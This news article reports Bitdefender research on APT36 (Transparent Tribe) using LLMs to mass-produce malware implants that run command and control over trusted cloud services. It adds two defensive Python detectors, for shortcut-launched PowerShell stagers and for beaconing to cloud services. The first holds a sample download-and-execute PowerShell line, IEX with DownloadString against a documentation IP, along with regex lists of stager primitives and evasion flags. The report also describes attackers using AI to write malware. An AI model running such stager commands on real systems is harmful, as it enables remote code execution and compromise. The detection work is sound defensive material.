Pakistan-aligned threat actor Transparent Tribe has adopted AI-powered development tools to generate large volumes of malware implants aimed at government organizations and diplomatic missions, according to newly published research by Bitdefender.
Security researchers say the campaign reflects a shift toward mass production of malware rather than improved technical sophistication. Instead of focusing on highly advanced techniques, the group is creating large quantities of disposable binaries written in less commonly used programming languages such as Nim, Zig, and Crystal. These implants rely on widely trusted online platforms including Slack, Discord, Supabase, and Google Sheets to disguise command and control communication and avoid immediate detection within enterprise networks. Bitdefender researchers Radu Tudorica, Adrian Schipor, Victor Vrabie, Marius Baciu, and Martin Zugec described the activity as an attempt to flood target environments with what they called a high volume but mediocre set of implants produced with the assistance of large language models.
The researchers explained that this tactic reflects a broader transition toward what has been informally described as vibe coded malware or vibeware. Rather than relying on complex evasion techniques, attackers attempt to overwhelm monitoring systems with numerous variants of malicious programs written in multiple programming languages and using different communication protocols. Bitdefender refers to this strategy as Distributed Denial of Detection. The goal is to saturate security telemetry with many slightly different samples so that identifying and blocking each individual variant becomes more difficult. Large language models have lowered the barrier for threat actors by generating functional code even in unfamiliar programming languages. This enables attackers to quickly produce working malware or port core logic from one language to another without deep expertise in each environment.
Current activity attributed to the group, also known as APT36, has primarily targeted government institutions and diplomatic missions in several foreign countries. Investigators found that the attackers used LinkedIn to identify potential victims with access to valuable information. Although government organizations remain the main focus, the campaign has also targeted Afghan government entities and a smaller number of private sector companies. The infection chain typically begins with phishing emails that deliver malicious Windows shortcut (LNK) files packaged inside ZIP archives or ISO disk images. In other cases, victims receive PDF documents containing a prominent Download Document button that sends them to a compromised website, which in turn serves a ZIP archive containing the same kind of shortcut file.
Once opened, the LNK file runs a PowerShell command that fetches the next stage and executes it in memory rather than writing it to disk. That stage downloads the primary backdoor and begins post-compromise operations. Researchers observed the deployment of well-known adversary simulation frameworks such as Cobalt Strike and Havoc, suggesting the attackers combine custom malware with established command-and-control frameworks to maintain persistence and flexibility. Among the tools identified in the campaign are Warcode, a Crystal-based shellcode loader designed to load a Havoc agent directly into memory, and NimShellcodeLoader, which deploys a Cobalt Strike beacon. Additional malware families include CreepDropper, a .NET-based loader used to install payloads such as SHEETCREEP, a Go-based information stealer that uses the Microsoft Graph API for command and control, and MAILCREEP, a C#-based backdoor that communicates through Google Sheets. Researchers also observed SupaServ, a Rust-based backdoor using Supabase as its primary communication platform with Firebase as a fallback, along with LuminousStealer, which exfiltrates files through Firebase and Google Drive.
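Because the later implants change language and protocol from sample to sample, the most stable place to detect this chain is the first stage, which is always the same user action: a shortcut opened from an archive that spawns PowerShell with a download-and-execute command line. The Python below is an added example and not Bitdefender's code or tooling; it scores process-creation events (Sysmon Event ID 1 or Security 4688 style fields) for PowerShell launched by explorer.exe or from a Temp extraction folder, decodes any -EncodedCommand block so the primitives hidden inside it are scanned as well, and flags the combination. The field names, regex lists, allowlists and sample events are constructed for this example, and 203.0.113.10 is a documentation address, not an indicator from the report.

```python
import base64
import binascii
import re
from typing import Dict, List

# Download-and-execute primitives typical of a PowerShell stager launched from a shortcut.
# This list is an assumption for the example; tune it to your environment.
DOWNLOAD_EXEC = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"net\.webclient|frombase64string|start-bitstransfer)",
    re.IGNORECASE,
)
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
EVASION_FLAGS = re.compile(
    r"-(?:w|win|windowstyle)\s+hidden|-nop\b|-noprofile\b|-(?:ep|executionpolicy)\s+bypass",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline: str) -> str:
    """Return the -EncodedCommand payload (base64 of UTF-16LE text), or '' if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except (binascii.Error, ValueError):
        return ""


def analyze(ev: Dict[str, str]) -> Dict[str, object]:
    """Break one process-creation event into the signals the rule combines."""
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    # Scan the raw command line and the decoded block together so -enc cannot hide the primitives.
    hits = sorted({h.lower() for h in DOWNLOAD_EXEC.findall(cmd + "\n" + decoded)})
    return {
        "is_powershell": image.endswith(("\\powershell.exe", "\\pwsh.exe")),
        "from_explorer": ev.get("ParentImage", "").lower().endswith("\\explorer.exe"),
        # Windows' built-in ZIP handling extracts a double-clicked file under %LOCALAPPDATA%\Temp first.
        "temp_cwd": "\\appdata\\local\\temp\\" in ev.get("CurrentDirectory", "").lower(),
        "encoded": bool(decoded),
        "primitives": hits,
        "evasion_flags": bool(EVASION_FLAGS.search(cmd)),
    }


def is_lnk_stager(ev: Dict[str, str]) -> bool:
    """True when PowerShell was launched by a user action (explorer parent or Temp extraction
    directory) and its command line carries an encoded block or a download/execute primitive."""
    a = analyze(ev)
    launched_by_user = a["from_explorer"] or a["temp_cwd"]
    carries_payload = a["encoded"] or bool(a["primitives"])
    return bool(a["is_powershell"] and launched_by_user and carries_payload)


def flag_events(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    return [ev for ev in events if is_lnk_stager(ev)]


# Constructed sample events (not real telemetry). 203.0.113.10 is a documentation address.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s')"
ENC = base64.b64encode(STAGER.encode("utf-16le")).decode()
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"Id": "evt-1", "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": f"powershell.exe -w hidden -nop -ep bypass -enc {ENC}",
     "CurrentDirectory": "C:\\Users\\alice\\AppData\\Local\\Temp\\Temp1_Invitation.zip\\"},
    {"Id": "evt-2", "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -File C:\\Users\\alice\\Documents\\cleanup.ps1",
     "CurrentDirectory": "C:\\Users\\alice\\Documents\\"},
    {"Id": "evt-3", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -Command \"Invoke-WebRequest -Uri "
                    "https://updates.example.com/agent.msi -OutFile C:\\Windows\\Temp\\agent.msi\"",
     "CurrentDirectory": "C:\\Windows\\Temp\\"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Id"], "FLAGGED" if is_lnk_stager(ev) else "ok", analyze(ev)["primitives"])
```

Only evt-1 is flagged: evt-2 is a user running a script with no download primitive, and evt-3 is an admin tool fetching a file from a non-interactive parent. The rule deliberately ignores the download URL and the eventual payload, which is what keeps it valid across the Nim, Zig, Crystal and Rust variants the report describes.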
Other components uncovered during the investigation include CrystalShell, a cross platform backdoor written in Crystal that can operate on Windows, Linux, and macOS systems while using Discord channels for command and control communication, with one variant relying on Slack. ZigShell provides similar functionality but is written in Zig and focuses on file transfer capabilities. CrystalFile acts as a command interpreter that monitors a specific file directory and executes commands through the Windows command shell. Additional tools include LuminousCookies, which targets browser stored credentials and payment data from Chromium based browsers, BackupSpy which monitors local storage and removable media for sensitive data, ZigLoader which decrypts and executes shellcode in memory, and a modified version of the GateSentinel command and control framework.
Bitdefender researchers noted that despite the increased use of AI assisted development, many of the tools contain coding errors and unstable logic. However, the main risk lies in the industrialization of malware production that allows threat actors to rapidly scale their operations and distribute large numbers of variants. The combination of niche programming languages and the use of trusted cloud services for communication can allow even basic malware samples to remain active within targeted networks for longer periods by blending with legitimate traffic.
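The practical consequence of C2 over Slack, Discord, Supabase, Firebase and Google APIs is that destination reputation is useless: the hosts are legitimate and already allowed. What still separates an implant from a real client is which process is talking and how regularly. The Python below is an added example, not Bitdefender's code or any detection content from the report; it groups process-attributed network events (Sysmon Event ID 3 DestinationHostname or Event ID 22 QueryName reduced to three fields) by process and service, flags processes that are not expected clients of that service, and measures inter-connection timing to spot timer-driven beaconing. The host-suffix map, the client allowlist, the thresholds and the sample events are all constructed assumptions for this example.

```python
import statistics
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Hosts behind the platforms named in the report. The suffix list is this example's assumption;
# extend it from your own proxy or DNS telemetry.
SERVICE_SUFFIXES = {
    "slack.com": "Slack",
    "discord.com": "Discord",
    "discordapp.com": "Discord",
    "discord.gg": "Discord",
    "supabase.co": "Supabase",
    "sheets.googleapis.com": "Google Sheets",
    "graph.microsoft.com": "Microsoft Graph",
    "firebaseio.com": "Firebase",
    "firestore.googleapis.com": "Firebase",
    "www.googleapis.com": "Google APIs (Drive)",
}
# Process basenames that legitimately talk to those services: a starting allowlist, an assumption.
EXPECTED_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "slack.exe", "discord.exe"}
MIN_EVENTS = 4       # fewer connections than this gives no useful timing statistics
BEACON_MAX_CV = 0.2  # gap coefficient of variation below this reads as a timer, not a human


def classify_host(host: str) -> Optional[str]:
    """Map a destination hostname to a watched service, or None."""
    h = host.lower().rstrip(".")
    for suffix, service in SERVICE_SUFFIXES.items():
        if h == suffix or h.endswith("." + suffix):
            return service
    return None


def beacon_stats(times: List[datetime]) -> Optional[Tuple[float, float]]:
    """Mean gap in seconds and its coefficient of variation, or None with too few samples."""
    if len(times) < MIN_EVENTS:
        return None
    ts = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.fmean(gaps)
    if mean <= 0:
        return None
    return mean, statistics.pstdev(gaps) / mean


def find_suspicious(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Group connections by (process, service); flag unexpected clients and timer-like beacons."""
    sessions: Dict[Tuple[str, str], List[datetime]] = {}
    for ev in events:
        service = classify_host(ev["Host"])
        if service is None:
            continue  # not one of the watched platforms
        sessions.setdefault((ev["Image"], service), []).append(
            datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S"))
    findings = []
    for (image, service), times in sorted(sessions.items()):
        basename = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        stats = beacon_stats(times)
        beaconing = stats is not None and stats[1] < BEACON_MAX_CV
        unexpected = basename not in EXPECTED_CLIENTS
        if unexpected or beaconing:
            findings.append({
                "image": image, "service": service, "connections": len(times),
                "unexpected_client": unexpected, "beaconing": beaconing,
                "mean_interval": stats[0] if stats else None,
                "cv": stats[1] if stats else None,
            })
    return findings


# Constructed sample events (not real telemetry).
CHROME = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
IMPLANT = "C:\\Users\\alice\\AppData\\Local\\Temp\\crystal_svc.exe"
SAMPLE_EVENTS = [
    {"UtcTime": "2025-01-10 09:00:05", "Image": CHROME, "Host": "api.slack.com"},
    {"UtcTime": "2025-01-10 09:07:40", "Image": CHROME, "Host": "api.slack.com"},
    {"UtcTime": "2025-01-10 09:30:11", "Image": CHROME, "Host": "api.slack.com"},
    {"UtcTime": "2025-01-10 09:10:00", "Image": "C:\\Users\\alice\\AppData\\Local\\Programs\\slack\\slack.exe",
     "Host": "slack.com"},
    # Unsigned binary in Temp polling Discord roughly every 60 seconds.
    *[{"UtcTime": f"2025-01-10 {t}", "Image": IMPLANT, "Host": "discord.com"}
      for t in ("09:00:00", "09:01:00", "09:01:58", "09:03:00", "09:04:02", "09:05:00")],
    {"UtcTime": "2025-01-10 09:12:00", "Image": "C:\\Users\\alice\\AppData\\Roaming\\ws\\helper.exe",
     "Host": "abcd1234.supabase.co"},
    {"UtcTime": "2025-01-10 09:12:30", "Image": "C:\\Users\\alice\\AppData\\Roaming\\ws\\helper.exe",
     "Host": "abcd1234.supabase.co"},
    {"UtcTime": "2025-01-10 09:13:00", "Image": "C:\\Windows\\System32\\svchost.exe",
     "Host": "ctldl.windowsupdate.com"},
]

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f["image"], "->", f["service"], f["connections"], "connections",
              "unexpected client" if f["unexpected_client"] else "", "beaconing" if f["beaconing"] else "")
```

The browser and the Slack desktop client pass, the Temp-resident binary is flagged on both signals (unexpected client, gaps of 58 to 62 seconds), and the Supabase caller is flagged on process identity alone because two connections are too few to judge timing. Tuning the allowlist per environment matters more than the thresholds: the point is to attribute traffic to processes, which the implants cannot spoof by choosing a reputable destination.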
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.